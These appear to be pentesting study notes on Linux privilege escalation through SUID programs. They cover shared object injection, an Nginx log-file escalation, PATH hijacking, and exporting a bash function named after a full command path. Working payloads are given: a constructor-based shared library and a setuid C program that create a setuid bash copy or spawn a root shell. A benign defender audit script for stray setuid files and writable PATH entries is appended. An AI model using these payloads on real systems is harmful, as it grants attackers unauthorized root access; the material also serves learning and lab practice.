SUID

Identify an uncommon SUID program (ignore the standard system binaries)

Use GTFOBins: https://gtfobins.github.io/

SHARED OBJECT INJECTION:

Shared objects have a .so extension and are mostly located in /lib/ or /usr/lib/; they are the Linux equivalent of DLL files on Windows. Run the uncommon programs from the SUID listing and check whether they try to load shared objects that are missing.

Run the program and observe what it does. If that reveals little, run it under strace, which traces every system call the application makes. Use another tool, strings, to output only the human-readable strings. Look for any "No such file or directory" error, which shows where a missing shared object is expected. Grep through the output:

grep -i -E "open|access|no such file"

Then place a malicious shared object at one of the missing paths.

#include <stdio.h>
#include <stdlib.h>

/* constructor attribute: runs as soon as the library is loaded */
static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

Create the directory in which the missing library is expected: mkdir /home/user/.config

Compile the program: gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c

Run the SUID program again to get a root shell

NGINX:

This is a vulnerability in Nginx. The flaw is in the permissions of the log files nginx creates, which lets a user escalate from www-data to root. You might find it through LES (Linux Exploit Suggester). Check the version using: dpkg -l | grep nginx

This exploit takes advantage of the SUID bit set on sudo. The log files are present in /var/log/nginx

We need to simulate a restart of nginx for the exploit to succeed, then run the exploit

ENVIRONMENT VARIABLES:

WITHOUT FULL PATH-

Check whether any SUID program calls a command without its full path. Such a program can be exploited by creating a malicious file with the same name as that command and adding its directory to the PATH environment variable.

cat > /tmp/command.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }
EOF
#Compile the exploit
gcc /tmp/command.c -o /tmp/command
#Put /tmp first so it is searched before the real command's directory
export PATH=/tmp:$PATH
echo $PATH
#Run the SUID program

WITH FULL PATH-

If the program calls the command with its full path, you can instead define a shell function whose name is that full path and export it, so that bash resolves the path to the function.

#Define a function named after the full path and export it so bash picks it up
function /usr/sbin/service() { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
#Run the SUID program
/usr/local/bin/suid-env2
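As an added defender-side check (not part of these notes), the following bash script looks for the two conditions the shared-object and environment-variable sections rely on: a setuid file sitting outside the normal system directories (such as the /tmp/bash copies above) and PATH entries that are writable or relative. The allow-list of directories and the script name are assumptions.

```shell
#!/usr/bin/env bash
# Added defender-side audit helpers; not part of the original notes.
# The payloads above leave a setuid copy of bash in /tmp, and the PATH trick
# needs a writable or relative PATH entry; these checks look for exactly that.

# Directories where setuid/setgid files are expected. Assumption: a typical
# Debian/Ubuntu layout; replace with the host's own baseline.
SUID_ALLOWED_DIRS="/usr/bin /usr/sbin /bin /sbin /usr/lib /usr/libexec"
# Usage: find_unexpected_suid <root>
# Lists setuid/setgid regular files under <root> whose directory, taken
# relative to <root> so a staged tree can be scanned, is not allow-listed.
find_unexpected_suid() {
    root=${1%/}                       # "/" becomes "", keeping paths absolute
    find "${root:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r path; do
        rel=${path#"$root"}           # strip the scan root before comparing
        dir=$(dirname "$rel")
        allowed=0
        for d in $SUID_ALLOWED_DIRS; do
            case "$dir" in
                "$d"|"$d"/*) allowed=1; break ;;
            esac
        done
        if [ "$allowed" -eq 0 ]; then
            ls -l "$path"             # the mode string shows the s bit
        fi
    done
    return 0
}

# Usage: writable_path_dirs "<colon-separated PATH>"
# Prints PATH entries that are relative (empty, ".", "../x") or writable by
# the caller; either lets a same-named file shadow a command that a
# privileged program calls without its full path.
writable_path_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' |
    while IFS= read -r d; do
        case "$d" in
            ""|[!/]*) echo "relative: ${d:-<empty>}" ;;
            *) if [ -w "$d" ]; then echo "writable: $d"; fi ;;
        esac
    done
    return 0
}

# Stand-alone use: ./suid_audit.sh /   (scans the live system and $PATH)
if [ "$#" -gt 0 ]; then
    find_unexpected_suid "$1"
    writable_path_dirs "$PATH"
fi
```

Run it against a known-good baseline first and compare later runs, since a new setuid file in /tmp or a home directory is a strong sign that one of the techniques above has been used.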
